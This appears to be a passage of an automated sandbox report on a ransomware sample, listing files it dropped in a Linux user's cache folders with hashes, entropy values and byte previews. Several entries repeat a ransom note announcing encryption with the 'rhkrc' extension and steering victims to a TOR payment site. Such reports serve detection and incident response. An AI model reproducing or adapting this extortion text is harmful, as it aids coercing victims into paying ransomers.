                  Preview: ..Pt`a7.G....r.4.*.1.E|.c%h.(..R..Y...0 .....4...\Om.C...q..y.c<....f.....C|..p.....0$...p.....<..do...4..w0.,E/J.. J.....W^..q0u.up.-V..s..1.....f{4.[.H.o.8H....n |........b...7=n)............q.`g<..Gsy.X?ba.w?..*......h.o36.g.....xQ..iy.....g.@.*_..%pQK...V].B.....5c..`n[..^....G.}w.|.E..[.%...(z...h%.&2...bZ..,6.aes.....R-O4.*.2..........SRn3K.c..%.F.3.......%..)..(..@{F.....e|.61P..aj....z.*.5'f`.P.XR........$.X._r.g9....8.E...Ao.32.A.lg.m3......E.&..."....t.!..G.gJI..m......>.(.........w..:....Bcb4..;....W...I...e.... ?'V..(........&..yQ.-a..?....}d..1.\.;.......(..#......<...7....o.Az.....A..t%...?x...3....}9.<B^.X..(...l.........I.......R}...K.X#0.0Sp....,87.B...|'N;6...j.1...@>.M.e.._.....T..-!...f.]......T.Y.#....N........Bqg...q...7..0......*........v(I.d..D......|@...g...X.WA:..bs..l.n..vt.Q.A...m*..........?%U....69V.A.4k..{...H.w.-)v..u...|g..a.g1.7..n.i|...Y. !..F".....V.Gp....w.....Z?.....x.H...d.......S,P.*\.=aH.........+.E..m.S.z......q......g.|.9+Q..b......2.X...YV...
                  /home/user/.cache/fontconfig/e49e89034d371f0f9de17aab02136486-le64.cache-6
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):12288
                  Entropy (8bit):7.97836588216719
                  Encrypted:false
                  SSDEEP:192:GwtUFlWuZsS71ZtuRXRCikzFG+O3et0AAzgmpUO9tyI3CIfDqsQHvG9oN2mqB9cg:G5FlWWB1ZtOXRszA+qWyg+UO3yIBOsyc
                  MD5:51C31A281AC2CB121FCD481FDA117F31
                  SHA1:D463D077E52B1866AF2A0D34EE804BBDA6788FC3
                  SHA-256:82287263786E2CE3455A663C145D554D1E0F358643ED2FCD076074F870C51F90
                  SHA-512:E4F438B7768330DED006954FD0E75ABEA93140965D8775AAB98D76F470247E0915196F84F9E82B92616B90CDE94E4C817FD0604758D2EEA852CC41309330CA59
                  Malicious:false
                  Reputation:low
                  Preview: .......!....[..N.....U.Q..1..SW.a.y.=....8...1C6.........W~8H...)..79..B.f....Yb.G....=j.k........q.r.........&q.|...KS.E.XS.../}..}>...G.J..r..@.....@.....=......0.....P.[|.sW.p..?....>.gI........Y.{..hL.....P.....oO.!.F.{.......Y_.<...<.k#............l....@|.Zf.^AY...+.....bqQ#.~.:..^........0..<..U..S......lu..v.T.k....{.c&..k~..t...6..........|..ci(....._.... .... .*/ ..\.E....=b..@1KkMc.....z:L.2M..7O....-...*.... o...L.A.g-5...+.Q.ou..).I.#.sSy..[w{Z...x.ZF.....b.....VI[c$C..9.....).w..5....s....@:.3!...5...I....?...U..IMG.[..\.....J..0;.@.z.;.7.|.y"..^<...1I:....2pD.C}.b...w.x{LuJzI...ah..............O...u8K"+g..I...$.....&.s.oc-........-...uKv..rQ..(....p._.....j..`w.G..!....p....2;...".ap.Fw..n..G...... X..:.4.+.....4t.....oG.B.:.^"?4Ht.t4..X.y.......bZ8.T...0.`C. 9.J.........2..(.....7...J...]O.Kb..'W...j.....,D.$....kx.....e.)(l..J:,TK...;..3.R).`..~..Y.d.va....q.........(..f_^..h3.....f,L..Ga_.]..E..X1.....2Uu.t.\.*...>#].H..]cg...r.[.C]...U&..]<...Yl...F..!....../N._T}.' .
                  /home/user/.cache/fontconfig/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/gstreamer-1.0/registry.x86_64.bin
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):607602
                  Entropy (8bit):7.999664121361636
                  Encrypted:true
                  SSDEEP:12288:fezUkiiEunvLFxEmJtd+UnyyQinw5iYwHCSAdgvwDRLfICaFH4bLHCTB:fcUQLjEk3oinEEuqCU0CTB
                  MD5:F31A12DDE949A4F40CD240DBB73B89B9
                  SHA1:344740D6808AB9D506A42024126F914F355FE9EE
                  SHA-256:5DCEBECA496B1B27DA2D3DD79998AA1BAD7EA622285B7D60FDA6D55617D2D26C
                  SHA-512:F61ECDD42C2825D42830A3A0E413B94C1241FB0F79E8CAC12C808B6BB3501F58C890EF225A5C882EB3E6B1EF1F421D398D824B828895F10A8586D3AC481F66FA
                  Malicious:false
                  Reputation:low
                  Preview: ..<..Z~?7+).........$..V.cp=#MAO.H....Z.$..d.....#.7..... 8.o....!x....%.m@o7=abD.(0...).%.A.47.4...rB.Xn.t.{....7....;H.......7 ..%U(...|Q.e..P.G..q....z....eeE.X...Q.. ..{....l.{.A.u0.5@....4c..T.=...x....[T.>Z'....['...$..T.y*.H..-.c.3yt..y....L..@j3...FN.Z.$...*...C.....h...U%.e....;...B..zA..Ss.uR.p/...v5:...x..6..A.0R[. }...D.6'...v51..i......[.q.!L.Q..K........{...R...d.],....3<.Xo.9S|I+V..$..;.....I9.....XNB...XbjcI.z.wQ....*.....1j.Jl...jT4 .p....0.MNSoz...+v).....A.-.n...zR|]5.{..ZYE&~s.....a.=...@...K9...~.yp...)..1l..A.G.w9z1..G.*..Z...=..wx....]....C..$.lH....w..`{7XQ.S(....KB....k......3...6..8...../. .X....O..[..(.tB...s..ks.gN!E1s..BRmW.l..c....y..<...#.............>M!_.J-..vPQ.........[...&.A...O.p7n.)..V..i..l.....M..+".}.:.>.....,#.Q..9...X....CTsR.....Q......Gv.v..'..zC..z.......X.....MC...M} 5..Td..X..uHZ"C..@#-...2..N..y..<y.....N..h.q....U..K`....]........H1_.....$.[6b.......z%.ZK...%.9.RG.d.F...|...[.M1>z0....N..{....?.....3..=.!Gc]....w...4..8...)..A..-I...M...
                  /home/user/.cache/gstreamer-1.0/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/logrotate/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/logrotate/status
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):1314
                  Entropy (8bit):7.608775151726018
                  Encrypted:false
                  SSDEEP:24:i0GocTxxOixecdox0TCJrbiiKRfTDOTrI2DfFz:iZocVkiVdoqTCrKf+TrBD9z
                  MD5:42449233328893581DE77900050F9016
                  SHA1:9B60C1ACBA9A16034FF45130C34E173995270C04
                  SHA-256:7932E045BF381DEBD88F7213DBF6B9F074C2B85F9B42D1A453A1B8BC06B2DB5A
                  SHA-512:C54DC878EF86349CCEEB0D48B3D1AE9C25B7FAEC6C1E25C7507472E99730B8BEC32E8242FD8D1562AECAA810786374ACB007DBCF916B0A64203CBDCA71202D16
                  Malicious:false
                  Reputation:low
                  Preview: ......."..wX..`..Yz.....V..?A@.a..r......^...~..S...+...*^..W(U..C......\N.....Y....^.......erwi.qg...*.9{.+.h..z..5.......d\..uKe!5..jN.y....j\>.M.g..b...!.J0._..:..{....+...1..D...E...KY.m...%L.Y@r......][.._...!....7...0....n"eR..L..*..hdH...[;..|nM...y}..hg.B......`......kt.3C.s.F.yN...$\E....Q.....xL..-...H...N...G....u..62..C0....1.....<.UF......U..#=.H....K.......gf,o[..3..N.K."HLP%.................y....;z"[./..:;H.....g...V...O*.wT....).n.t.*.......Q8...... .....,..u...iO..P.....p_...n..7.lj..RD..|D.&.M[N.(K...M...n......_.\N...*:p4...7.C..qF ...^h_x.).........UhyD..:....e.w2..t4#p..>e..m.b.h.'.=.a..9.#..4...Y$.W$......q..<2.....1?o.yz:...QUJ.\......0.......h...d..a........q0a....f.lD.n....B....7...$L......iL..$.BUS..z..Z..^.,...!.#...*.|m.n..h...S.Sc...E..*.q'........:..GT'....U..W.....o[.05.[....[.}.....LD......O..,......\...R.....o..[....N.w............B......P:R|....z.Q..!...w.R.....$..o.N...../..1;0..B..N.ap.0O;....(...)`...$eat.].....F&9..5..8.C./...y...G.a..m,&j........S
                  /home/user/.cache/mozilla/firefox/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/OfflineCache/index.sqlite
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):262376
                  Entropy (8bit):7.99924185703449
                  Encrypted:true
                  SSDEEP:6144:sq0iP6GKI2NkppsfyvIJbJ7DL1RZk810jSRMUAcNyOhi:n0iHC6vIJV71vkR8M2Nysi
                  MD5:2ECD64B077A532845417EAACB93FA97F
                  SHA1:A50E7B9842DA3575018F3C9028738E937E2BF857
                  SHA-256:EFB220EC0B398B81DAFB82069EFC9A92DA32FC60469E70523551DFC86DEDAD10
                  SHA-512:0ACAB122A797263FCA92F99A97630A6045AD8860E65DFBBB0816286496E821FC8FB56636D9AD8DB1BB51CDCF5ADCD7BC04E4644EF355B7F8BA98A76C6751300E
                  Malicious:false
                  Reputation:low
                  Preview: .,.E.....I..l.....-...N..K. ....#..g($...r...h. .....!h...)zX.....S..aN..p....y.....&.&.b[...Y.c..:.............Wu.......<B{...9.'.+...k.........8M.......w....A^.H.R.2A"J.\.$..s...(....:...C.&lr..0.V.:e.g.}jk...a._&...m.....f_$!....A.w...x.s..j1..AMyJ..(<.B..m!.~....%v....a.......K.>....?.J....Xc....fM..{kT.mu...:?.7...>..P.....8K.$R......V9.O.._sQ.OI.y....g.).b.._....u...OQFC....CNI{.1V.T.J.5.P.3Fcf...g%..Y......c..t..\D.........._}>.V.....I.K._..=.SR=............Y.z...........Z7F...4.@.r8S.|.oa.{...t.'.#..N.R..#-..+.F.'.. .rb...P...~i?R.^.0....*.....=...|...."m.@....D......_E..SVIZT&.mm.......C.w.....aP.%..F.&.$w.m.\.V.E.....W....G.Jr..b..yJ...:}WY.3i."....@.gv.....a.(.@u..o..o.R..t./.P.v4<7|..l..5f.....9..g.>5..."...Z....6...3..(..'...T...gS........`{kc.>..W..........K+.l..HL.3h.qJ....)<..jq...Y..`.<......xm..5.......W.k..s.x.{u...S.nJZ....i.H.W.p...bi....9...X.Y.P/..G..F...u...J.J...s.....r...7.C.Z.+...\..F \.h.....K;..c....F/....8i....:.6.ng.I..1.....BMJE....=.R.?l...;z..{..>I;.y;
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/OfflineCache/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/doomed/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/05582FF5C196A4485F189490FEC9ECEA0890DA32
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):42835
                  Entropy (8bit):7.995385543060983
                  Encrypted:true
                  SSDEEP:768:u5HWATKZPnSYoU2etE0sI8joIEnTy1/wC2y08ZCLbNOOlTTygVust+0LhxNc4BFt:u1WAMPnRoVee0sIrI2yToX0wustXLhx9
                  MD5:8E094B956015F1F013F43EAE154D9330
                  SHA1:251065880F68C0FEEADA40CE295837AFFBCC7360
                  SHA-256:8932D1F35BE1E6F1D1669874AEEF905884D1126786017F384A6157C0D5AE69EE
                  SHA-512:0E674568CA00FBF53925906B272DF4A638F8A49F016704BBF98193341E56C5291C9DA1DC95080E4847EBEE1F882A09B6C0FC611EA1E9CABD1A16A7EE200C9C99
                  Malicious:false
                  Reputation:low
                  Preview: V.....{Y96........,+o.g.$........v.l..b.7A[..xW..... ..E.....A....|.?..Tcn...$._n.....4)r~V.P`....Z.|4...r..."....N....o...{....s..$..a..B/..O"vp.P..8.|.a..?..a+.y.........T. ..'7..hq...Z...8n{@...R|.1V.....W..........z.i?..o.....^.0n..h0...MSuK..o......m........,...~.p@....l..?a].....k.1"'{-;...K.. ..r......]..3....@.V...Y5....a.Y..t#...#.z..o........:t..+.{.....&....4..fU./$".j..n..3Z*.AS........j....Q...C..U....^.#3..'.>.@...gt..O.J|$.+0t.\9^.\..W..m.2.4,1..DO.?y..=y3G....5...B[.J.V.{R.......d?.$W.....D.'+E.0k..7K...=...Y..^.".=DQ~...J(.h..(..kt..c2..FZ..a.K ....2.....N..I=.I.wg.,>.....p..q.2..)?.....V.I..;E..3.l.dmI...m...p....X({.3...j{[...b....h.......=.x`....ev.x.}....;&.....8....G...'.....R.%.HC...V'Z............o].....%.B{U.aMH.......y.......Y..9&Z.P"[9....-..T..6j...H........O[..r..Mt.......a.6..~V.O...u......=.WH:....?..L....{\@.....U.....d.".........N:............c.8.{.H@pS3m...ZBq.:&........NV.a.3.X...gFC.=.L.N....ja....iJ..........6d........b..V.> .lb.F....=...9z..V../.fz
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/076B04687E353A48BF9F8F54C7556DD5EE9381D0
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):7453
                  Entropy (8bit):7.956802781557367
                  Encrypted:false
                  SSDEEP:192:H61AzBWPFEflE1jebWx/vMKUmvu/DeoQJWl87zexUV3:H5VWi9E1wWp0K8DLQq87zR3
                  MD5:0DB20516CDD71EE51D0E7FA516043EC0
                  SHA1:364E2321DAE7050A04CBFF09673F5035AAD386DC
                  SHA-256:081426D99E0ECAF0B6D67D0371884D93D4A86463B697741667D5827538E58F00
                  SHA-512:178AE519C9E84B84D9E05C5E87BB683446A8BBA98733AA487D98CAB1C97E86430B7C7BB89FF85D9B19CE3F67AF6696A9EE537604EABABE07D7C381090338625B
                  Malicious:false
                  Reputation:low
                  Preview: ..Ya..c?.(..2..L1.....4Y.!0..>.........6....$m....P.0....@....`...a.G..*8.`#P. .F...w-f......h..g.6..D.....I....1...R..5.'Q.G....`G..d.......{.......w|#.........;.."...~"C^.E.'.Rzc-N/?..DbcO.^.........*.i.l..\{..*N.d../sg&...RA..r._..F$.'.1..%....y.9.e....)Fv.8s..$..{..m..Q.......:P..|......\H......K/..d:.$..$..D..>....y=.`!=|........._........../.B..\"...,...A.1../.0iqw..@.?oh=dmj....?.'.........l..'......V.."X........Ce(d.}.q....:4...jg.O...a..n...xe...q..<............b4..{.`.f.W@r;..f......=/R.$.CN..]5......Z..E...M....#W.......i.x....Fs.....D.j.....l..+..29'&dYaOnn.$)._.Z&h..Y..RN!.F..]..q.Bx ...b...X?...?..C.............$.&..E"...W.\:...kt..R......9...[N....Fp/.......LU.u.<.ho.OlN4.]J0..M...5M."......|....V...$?}.U.......a.}e...e...%w...........s..q6g...i. ]_./...ZJ.O.....0.uch.od7.x.s2R.....FX.hFN......$b....Y..\...h;.I....u.qs.C.Q.jU..l.|.........kh.....T.kq...v.........f...@.M....H..gkmn.Z.{'...o....."..H.5o.P..P..I...-.35.....=dE.$.{.p..!.PaT,4o.......b..........38..q....Z5..I
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/0AB1BE712BE7745C73A5EFA8DFC4780205FD18D7
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):10420
                  Entropy (8bit):7.970848600933643
                  Encrypted:false
                  SSDEEP:192:anBB04ALqewCmKtGsfQZS0xjF4IbeoexRk+PXbpXgHeqNAKaQhIAOiqJVAx:eBBpAotsfQflFv3cTbpXgHB89iq0x
                  MD5:DF9BD8E40C615CC728AF02ACC63F9427
                  SHA1:38B246A02D1C5BE2F609C1D22630878A19FECECC
                  SHA-256:EAB2DF44CEF1CD1B6D51396BFB6353CD558ADE74A106712979D1B4F1C8F48ACA
                  SHA-512:D595464B4C20856E5263C1EDADFF096599651418AF12AEA572FACAF858939261C9E323AAA402722B6A0178491C3047B0F49D431D69AA840DB9E7C0DD6A2FEB7F
                  Malicious:false
                  Reputation:low
                  Preview: n}.k../.?.w...KEg..p........QO^....S...Fr;|.../..;.T.W..H...}...X..l.........;.R.|O..p...T.jz.+...;\...o......,......8...8..Z8....u|a........^.....7K....NGl....Y.q......:...Nh.&.)A.Q2....Y..mI2...b..d..$.Sa.........<...3]..!G?..W....7&.u.>..*...?......&.m.?.Jn......X..9l.......Vzyk....za.u...5.......g.J;./.pp........Qr......38U&AA.Y...[.?.#..a..+)[.wO...!..K.....\..m|.z.1..l....i.........U.7..&$..%U..K...l''a.qi...8.....].....'.F..n.H..2U.....j.\N.Q....t....E.)..-SxM{(.Z.<.%^*.X!#}.....*....[...A,p..O"..O-W.......`(&.!..5?...^oc..J.r..v.t.<......t.k<.W-.kS..x/...JZ...O0`W...F:.....F..;E6E2..v.}..f...7..O.6".....%.....be.|..!i......".....&...+..H...Ff./.+..`,.{P.Fl.?n...N.S. .).|CC..!.AiM.........9Xn[_.&."..O..y..0...B..*b...>...M!.....1$&.M.L...pw....s..R....g.9.*)...c..W""P...R7:#y..f..`.)... R...%W.*.|..kJ........m.........kW....6...u.=b.I....4...d>.H.:.."..=......s..T.T3.Kn)y.VT.id...``.b`.....K. <T.^..D.8..q..[3...@Q...qv.A.L..n.....*..H...q..".K...x.j..*..O.!.8q},..E|PE.0...31*m/k
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/0EDDF8C091E2FED62E44BEDDDC1723F5BF38FE4F
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):548
                  Entropy (8bit):6.908038435973982
                  Encrypted:false
                  SSDEEP:12:vGRaf+Sq0MruGBU/xO7yxRi7FSNgRnsL2DcUB/e1i:uRarcU5Oyi7fsL2DfZe1i
                  MD5:CE77D4DA412A88FAB19DE66364288AF6
                  SHA1:B7CDB6AB864D98DB74F8FBDADE1F2132B69CB39C
                  SHA-256:D23BC81342994D333167DCD2504329AE41B06CAB19159F02EAB7DA05314EEFE5
                  SHA-512:770C8A21DEDA45471C2CCB5552A767F159B9F5F312793C8F4B0A2DF10FC9A6CAE8A1263CF0CE7F5F3DDD97901ADCF27DA211DA24991CC428F67C0454750ADDF3
                  Malicious:false
                  Reputation:low
                  Preview: .u......y..d*g....x..Nw..K_...m...n=hw......w.Q..1%QR....N..orm..A*....%/.........z...v~..P..,....=yq...\|.. ..>.I.g..1I.&b!.........s)o-.....8....?M..q.}..Y.Z+r*{...a......)I.[.O.....L.#A.:..E.|s<.Jg.m../'..&.e..B.3-..[s'...,wAW..0..1...v...\....y..........*/.QS...yF+.Z.QC.K&....=...iJ...9pC]c.j.....M.............%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................Q8.i.....#fnd.o6..Y`........y..(7...f......|.........G..
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/13B6B1BA274AC60E2BBF033AA422B2D3D3B07FD1
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):7907
                  Entropy (8bit):7.961309114632904
                  Encrypted:false
                  SSDEEP:192:W6yHBdYX5syqyS5px8zppuC0Ir5cYHi0G6bgvAHL6g0cWHwFcrH:ADYpsyT0xUzuLqawiUugzWHwFcrH
                  MD5:8E2629578088C1F2DF797D57C783C345
                  SHA1:91180A5314457C3409DF108AAC4CAC62388396DD
                  SHA-256:178569239D975F9700FDC2490C6BCEFC83721A9FE5787E534A6798735855FAF9
                  SHA-512:7439E663ABBAA8BA4B68BA29311E5739A8E267C8755B882BED33D1FC22FA4B9E6C35D173FD7826019969D2764E5DB0E7FBD3949DA82552BA3455646450F26915
                  Malicious:false
                  Reputation:low
                  Preview: +L..d~MN\0..&.z(...M..h.w.....G*...K...T(......\..t....l.}b..v...f@y0.......+..r[....\..Z]..s.....F.hW..sG.+1'..e.V...*.fxVD.....$.&..?....8_}_...z..#....l..LN.g.F.}..R.q...t..R~.NQ.]..^.3.p.....}...%..9..<...t&.o......w..D....5"..%-.7[rRL.....q.....r..f..E.A..={.K.uF%......Mp5c+..Z.............r..vR!...\....i....P*.......)..P.ZB.!...K.Y....W.q.y..l9.0k..{.J.......|.@...S.Z*a0.iQ....a.........E..1.P.f......S..1..bg+..b1..o.&...-!...x.....\.:....b@.|..#,.u4.$...p...l.=S....(......5yxWhc.F....^..Yg.^....^"2../v.$..>A.BcJR...W...[...T[sa7w_.:..u.I...\...5....6........0.X\e."..._n..;g3..cm........i..s....k.f..J....h..C.A........!P..],...<7.fM*..qa@.....c.9.........%.S/H...L......f.....|...<a)<......5.=(P..[<.....fT.[..e..-.M...Ot.k..u...L ......(.....A.??6...HOH..P..9.P..S.i.l.\......:...S...Dw...G9y4G...j..I.rs..e....*...L>..z.tO.O...8..d_....xk+.+.(..i*MQ.(.z.).Q.(b.[.H..9.m..].1..Fs..(7g.W..O...PJC.O.n.....s.. q...&....e.........P......p..S.......h..pS.q..'...a.....U&~9...=Qa....A}.9...
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/1679441B8AA7B4D31717C773CC4E86A25B37532B
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):13620
                  Entropy (8bit):7.982926969658677
                  Encrypted:false
                  SSDEEP:192:b/sdZtLYjlDVv/NPSo6fq4DTHSE/xhbEXXZxQaKkGO2FYdjRiGPXH5NJXiv4z:b0ZtUjlD5/lF6DfhLb0XZPOtALf1Fz
                  MD5:462FEB1A942EF1CB9007A8C7AB23CB3E
                  SHA1:3B665E94DE7549816EF7F8B4F9E56EFAA70E2F92
